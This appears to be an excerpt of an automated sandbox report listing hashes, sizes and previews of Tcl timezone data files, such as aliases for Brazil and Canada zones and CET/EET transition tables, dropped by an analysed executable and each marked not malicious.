                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wKy4oeyXHAIg20wKARL/1bIAJl0IAcGEwKyovn:SlSWB9vsM3y7/rDSHAIgp/AN/xIAE90j
                                                                                                                                                                                                                              MD5:E0D0EFBEC37E27532B49FF6DD9893DA0
                                                                                                                                                                                                                              SHA1:9C00993A885AF448E48201A46E17629A7A602FC6
                                                                                                                                                                                                                              SHA-256:A676562A90FF8587A775F6F0E3BE05D870456A56D25B5330816BF9043C8D475B
                                                                                                                                                                                                                              SHA-512:AB0E6907F9C0002CA5C050A0069AF013B14BADA08CA4553C96B302C078DF7629D5D7EDE4A19A53DEC6E7B9E6D9857F14EC7A1DB9BC11F2EEC9FFBAC70E129EEE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Noronha)]} {.. LoadTimeZoneFile America/Noronha..}..set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.948480276987682
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0tQJXveyXHAIg20tQJE6RL/1bJHIAcGEtQJXy:SlSWB9vsM3y7tIGSHAIgpt36N/xR90tF
                                                                                                                                                                                                                              MD5:FCCB5F44903E1B988A058E5BBF5E163B
                                                                                                                                                                                                                              SHA1:E1CC03DD4A804C7305D8B0C12D8451D08AE262EA
                                                                                                                                                                                                                              SHA-256:961FB3AB99A63B1E9704B737EAB2D588B5A39D253A213E175CC678BEDFFD498D
                                                                                                                                                                                                                              SHA-512:F31C80E4AD6EBE6CB8A3382E0052DC47601D073E8F81375D50241105675AA3AB45433FFD0534524D9992ABE1086C6671D85FF7C72B0D6766EB9984426F608B77
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Sao_Paulo)]} {.. LoadTimeZoneFile America/Sao_Paulo..}..set TZData(:Brazil/East) $TZData(:America/Sao_Paulo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.902113962502196
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0znQZF3vXHAIg20znQv5RL/1bbAWVIAcGEznQe:SlSWB9vsM3y7zn+PHAIgpznSN/xn90zN
                                                                                                                                                                                                                              MD5:9F4B43F4F27D0B7EAC0C5401A1A794B4
                                                                                                                                                                                                                              SHA1:2A8543B994E93E54BD50EAA78463905E6A8EBE74
                                                                                                                                                                                                                              SHA-256:0500C9A248C8CE9030EA30D0AF9DD95DC465480BAF60646C0B7C511FA23C6D1F
                                                                                                                                                                                                                              SHA-512:0ADAF708ACFBD80F4704951EEBC24AD144FD5856997A429279E804F3A7F7F9A8FED41DCEE85BFB1ECDBF1E05137E87E7430186474BCF5DE42067FFC74746F048
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Manaus)]} {.. LoadTimeZoneFile America/Manaus..}..set TZData(:Brazil/West) $TZData(:America/Manaus)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.7984816540097843
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:09+xKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt7:9Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:6DB983AD72FB2A88FC557BE5E873336F
                                                                                                                                                                                                                              SHA1:C64E988010087ED559A990B3D95078949C9B4D72
                                                                                                                                                                                                                              SHA-256:E2AEA7CFD428A43D9DB938BCC476623ADC1250BD8057013A7FFF5F89D7FF8EFC
                                                                                                                                                                                                                              SHA-512:C0A646F80FB2FD42D9146A4FD36CF5A7F62016684F8D5AF80453EC190F4AEA65EDADC5BCF071AE746ABFB43B29C27B2743F2152B6986D41BFDE1617CA774A7C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CET) {.. {-9223372036854775808 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766623600 3600 0 CET}.. {228877200 7200 1 CEST}.. {243997200 3600 0 CET}.. {260326800 7200 1 CEST}.. {276051600 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}.. {323830800 7200 1 CEST}.. {338950800 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.8095769056779916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:e3HgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:eQaUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:A6F88C55E8613A27DE3E6C25B0672910
                                                                                                                                                                                                                              SHA1:3B593CC17BF153A6209FC5AACE7B88DA9603BD44
                                                                                                                                                                                                                              SHA-256:73A9841F233AA657AFB6CED8A86A37D55FE5582DD996B9B28975D218BCCC078F
                                                                                                                                                                                                                              SHA-512:526A922B1594A2800B03F363F7BFEC29203D4A4F2B49C5F2618469F59176CE4F8AFBA0616B226AC39D308DB05DE7147714D9B6CDBB2EA7373A041A4D47F50E2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CST6CDT) {.. {-9223372036854775808 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-84384000 -18000 1 CDT}.. {-68662800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.804821796604604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/0nalGe2IAcGE2NEOyn:SlSWB9vsM3y7UEOXHAIgpUEqA6N/0af9
                                                                                                                                                                                                                              MD5:33A04963E70EBF29339204348E0DF874
                                                                                                                                                                                                                              SHA1:456C0DB88ECE4D180EEE5AE5AEF5FBEB6E977D00
                                                                                                                                                                                                                              SHA-256:6DC6354D761CBE7820C9186568CAB87AD48CA925507F6A740357195B60E16D87
                                                                                                                                                                                                                              SHA-512:DF8F46827760BD7EC922C6837E0B6649B4FBD220B79E6F1B67FE3DD8CB3D2D035ECDAF4CF6CE5BDE6DC79C6F7B6EE2B9787AF08A97845CD0D647720A2E78D7EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:Canada/Atlantic) $TZData(:America/Halifax)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.863241040396457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0po/vXHAIg20puFvHRL/0nPQox/h4IAcGEpoyn:SlSWB9vsM3y7pYHAIgppuRN/0d490pl
                                                                                                                                                                                                                              MD5:97E50CE9FBA3F1A6DFCF333F9E6D592C
                                                                                                                                                                                                                              SHA1:EE472C411079E788DBF32FAC9C5B7EE121960DC2
                                                                                                                                                                                                                              SHA-256:DB32E83949D62478D229E9FB57BB1624D21B3A9CCEE4CD55335F8262C01D820A
                                                                                                                                                                                                                              SHA-512:D547E3DC03848A677BE67F7CF4124E067F76EE09BB724A5B10F028BEA72C1526B17678A035B2C53F69498E9ECAACD3C5445D42B7FE58DF706DD2C5F2ADA05A73
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:Canada/Central) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.758562813220951
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/0nbHboxp4IAcGEqM:SlSWB9vsM3y7RQtHAIgpRQPN/0Dboxpp
                                                                                                                                                                                                                              MD5:4365BEFA3D50EEE20843EF97A095E512
                                                                                                                                                                                                                              SHA1:7756049B4CD6459742686925E9516E64A9727306
                                                                                                                                                                                                                              SHA-256:22844994AE893F3236A091B050E932E84A5218EC0D01F72595E17CCC471FA564
                                                                                                                                                                                                                              SHA-512:CB265E79DF926026BEBF7158590369ABE5353C759540F509ABBA2A7ADBE59A705BC2AB936F400614BE610EDB761DE9A2B1E179A0A8B0A87E595392362C2516AA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:Canada/Eastern) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.8181126338833655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx07nKL50vXHAIg207nKLyRRL/0nNYLo/4IAcGE7nK1:SlSWB9vsM3y77G2HAIgp7bN/0W8/4908
                                                                                                                                                                                                                              MD5:FA0D0024AD72CCE4EC7229FA897FB1B7
                                                                                                                                                                                                                              SHA1:4373A07F2674FE974189CC801987652AA97F0204
                                                                                                                                                                                                                              SHA-256:D7A203E60FF19DCDEAAD14121720DE51DA73392D25B40FFA301C1935CDF89517
                                                                                                                                                                                                                              SHA-512:82EF7F429604A69734B04D298B4C9C9AC3BE57B9DD8C4CECF59C7AB3470BDFBA0505886C4E6AA3864F5EC7FBB4C69C54CF153A6417376828234833013C29A0C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Edmonton)]} {.. LoadTimeZoneFile America/Edmonton..}..set TZData(:Canada/Mountain) $TZData(:America/Edmonton)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.998628928230972
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7tgYJHAIgptVN/0xdBx+90twv:MByMYnKpTt590g
                                                                                                                                                                                                                              MD5:A2DCCB8BFC65DD4E7C3BB7F10DCEFF11
                                                                                                                                                                                                                              SHA1:6FD2F4FAE06C5D4D3F189A167A98AA76497569DD
                                                                                                                                                                                                                              SHA-256:87F42F45FD7D059CA47650D445420DE8320F3A7C1CBC7671FBFA8A8881274433
                                                                                                                                                                                                                              SHA-512:F42E32C5BD785BA914E5054784BF67DDF951460A708290D1899621CEEDC63475B584FC052A86A3B6D45BF3C651D42427FB6F9CE2A2A33764DFFF731053BECC16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/St_Johns)]} {.. LoadTimeZoneFile America/St_Johns..}..set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.887587766811186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7ZLgXPHAIgpZLgFN/0N290ZLgK:MByMY13p1stx901/
                                                                                                                                                                                                                              MD5:68900CE38FE0E40578323BBD3D75184E
                                                                                                                                                                                                                              SHA1:9D5EAB5CBCD495DD46974207FBE354A81DD2070F
                                                                                                                                                                                                                              SHA-256:5C4FD46054B190A6D4B92585B4DAE4E3A8233EE2996D14472835DDD264911DC6
                                                                                                                                                                                                                              SHA-512:3EF53F0FCD8D88A1B977886BDFAA03D7B84EF021AC6BEDF7C571BFBF2242BFC3F3EB6A6B6A9C2F6852AF412A96DFBC30F3BB25A6619CBCD8736F3DF5B64DE1BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Vancouver)]} {.. LoadTimeZoneFile America/Vancouver..}..set TZData(:Canada/Pacific) $TZData(:America/Vancouver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.887593462838566
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/0nogS64IAcGEsAzEB:SlSWB9vsM3y7hzi2HAIgphznN/0Hd499
                                                                                                                                                                                                                              MD5:A4237BDCAF68B0EFECA97178F3DEE724
                                                                                                                                                                                                                              SHA1:A9CBC02B5545A63A0C9B38C8FA7FA2DE6D483188
                                                                                                                                                                                                                              SHA-256:46BA00AE3A07A4DC83D6CB517D87C9CBBA491B3421FE9AD6C74CAC5695EB73F7
                                                                                                                                                                                                                              SHA-512:832BF256BE8CB2DD205DDE50017448D5830B46FF4DCA77BDB852067EE0C9DF9977014F2A3E3DD6944336158D8EA377CFBBE519EE5B56FB26EB64325B45476B9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:Canada/Saskatchewan) $TZData(:America/Regina)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.889486451014262
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7peR2fkSHAIgppeR2rN/0CF/490peR24:MByMYkGk7pkOtBQ90kB
                                                                                                                                                                                                                              MD5:490D99BD5465CBF5A8FE28F33180B8A6
                                                                                                                                                                                                                              SHA1:4783295C31A804BE98145270ED28956A0783E655
                                                                                                                                                                                                                              SHA-256:A1B1AF37DC89C6BA663E4E967A18409AE4E0FA9EF1B908D0461368DA31001C09
                                                                                                                                                                                                                              SHA-512:9F6B4F204A21B69E1DFCB766C0671D3736414C73269DCEDCDB4FC3DBA869BBA1511DF6B5061F8964F0AF9C3816133D04E5DFB8A6AD07CA06E7712787A8FECC5A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Whitehorse)]} {.. LoadTimeZoneFile America/Whitehorse..}..set TZData(:Canada/Yukon) $TZData(:America/Whitehorse)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.812019117774239
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7tfEJkHAIgptfEJo5N/0rHM490tfEJB:MByMYE9pEOt4X90EB
                                                                                                                                                                                                                              MD5:6EF54792279C249B16877100682F1806
                                                                                                                                                                                                                              SHA1:A62629EA055207D917740E3AEF4F0B005EA49CC4
                                                                                                                                                                                                                              SHA-256:5B40167DD0C0B5C293861070C4AC249F78DDF8BAD798DD0165E3AE894C9B9570
                                                                                                                                                                                                                              SHA-512:3CF93003C3EA2B4386660F0C87074F9AE2BAC4EE72D88451DCB1EA8B79502D2187B1608B6D5CE8D7EDC00AED99CF9DB7B006EB6ED2A2B5009F2C0E757D282D74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Santiago)]} {.. LoadTimeZoneFile America/Santiago..}..set TZData(:Chile/Continental) $TZData(:America/Santiago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.808907056781067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG7ZAJWXHAIgObT7ZAiFvRL/0bxOdBx/nUDH7ZAZv:SlSWB9vsM3ycJAUHAIgObJAiRN/04dBn
                                                                                                                                                                                                                              MD5:2EC4FDD1EFBAF1D9F9DBAC8B1B5EDD09
                                                                                                                                                                                                                              SHA1:FECED8EBC7B666628B7B45C9694FCB3A0B20A42A
                                                                                                                                                                                                                              SHA-256:1E2DA1862E0E0F131B7C6EB12FAC5F920852C61C162993A30BC843A464A5AAD4
                                                                                                                                                                                                                              SHA-512:74D61141505BAF1ABAD61FB91941C63C169EFE3C85829FEBB4D29A72EA54D1A07EC84E2E9B48E963E65CBF7663245459FAD288D620B1BEFFE682A2D1C243794D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Easter)]} {.. LoadTimeZoneFile Pacific/Easter..}..set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):175
                                                                                                                                                                                                                              Entropy (8bit):4.857134440822812
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02TEMVFfXHAIg202TEyRRL/0lIAcGE2TEMy:SlSWB9vsM3y76EkHAIgp6EyRN/0l9068
                                                                                                                                                                                                                              MD5:3FB16EA4A9B0529220133C4A7B05215B
                                                                                                                                                                                                                              SHA1:BD56B6E76A92A5925140CB5CC3D940E1DE90993F
                                                                                                                                                                                                                              SHA-256:6F4F2D7F5BCA4E5183460C0153D2B98F5239A99F149DE6638B311C73CEDB1329
                                                                                                                                                                                                                              SHA-512:690EC1BCE7FA979BD55725B8ED6DF042BB331CAD332827B2C64B31F107539934AA5A30268B1F03D52697528E68A1BA72E4D56B5199A68B1ED897B75FAFB33A8A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Havana)]} {.. LoadTimeZoneFile America/Havana..}..set TZData(:Cuba) $TZData(:America/Havana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7440
                                                                                                                                                                                                                              Entropy (8bit):3.695300167191082
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:CgDIMcVbf+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlt:KlfyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:34339D40AC889DCB5A09D10F123175AD
                                                                                                                                                                                                                              SHA1:57E1F70FA8999106FA3874A9CE1E75A7ACBC81E9
                                                                                                                                                                                                                              SHA-256:64E284F9F7A36CC0A352809141D76E73A99344A9F30CFFEA254CBB9D2C589ADA
                                                                                                                                                                                                                              SHA-512:2DCF16D9D7593FC3E5844E18FD689AADA157866490CFD37A38A47F747DDA189822055F6DD470CA2D77040D2C5A2527512880C22ED8EC16D9424EDF3DC228AFED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EET) {.. {-9223372036854775808 7200 0 EET}.. {228877200 10800 1 EEST}.. {243997200 7200 0 EET}.. {260326800 10800 1 EEST}.. {276051600 7200 0 EET}.. {291776400 10800 1 EEST}.. {307501200 7200 0 EET}.. {323830800 10800 1 EEST}.. {338950800 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                              Entropy (8bit):4.924838898127838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yLbNMXGm2OHLVva0v:SlSWB9eg/ylDm2OHLVi0v
                                                                                                                                                                                                                              MD5:B221E7141FFC9DEA317F64F81C7BB4E0
                                                                                                                                                                                                                              SHA1:B13BBDE790B169D8B9075275523F319D5173E2C7
                                                                                                                                                                                                                              SHA-256:6344BE02529C1CC5F7B5FE14B7E9BBCED4DDE68A24B824601EEBCAE207ABFDF2
                                                                                                                                                                                                                              SHA-512:FFFA733476D6C7DCF49C0B88C9F5E381DE2B69BAEDF6C7B1D91C6F45CE2D36E06D40F25B6BB65D4B5D650471BB52CD2EC3F68703DAB4BD5414F8D3F831D92BD2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST) {.. {-9223372036854775808 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.8091719283634853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R+kNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:RXoSItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:4578FE48781599B55F4BCF5560019789
                                                                                                                                                                                                                              SHA1:4EAA7134621DFDEBFD1405F5CC58227FA7E80C3A
                                                                                                                                                                                                                              SHA-256:0BE6161403BC5A96BFAB174F2C3FCBA8A677D4349699B408E9872B9DD0FE15CE
                                                                                                                                                                                                                              SHA-512:9ACC2EF396F635D22E3DF6B785831AD74B510049F1BE85F996467A5BBC0DF49A28B2FC3E4CA0CA9DC8FC2C29EA50D909F0B153265B107445D3052E81D9A4D50A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
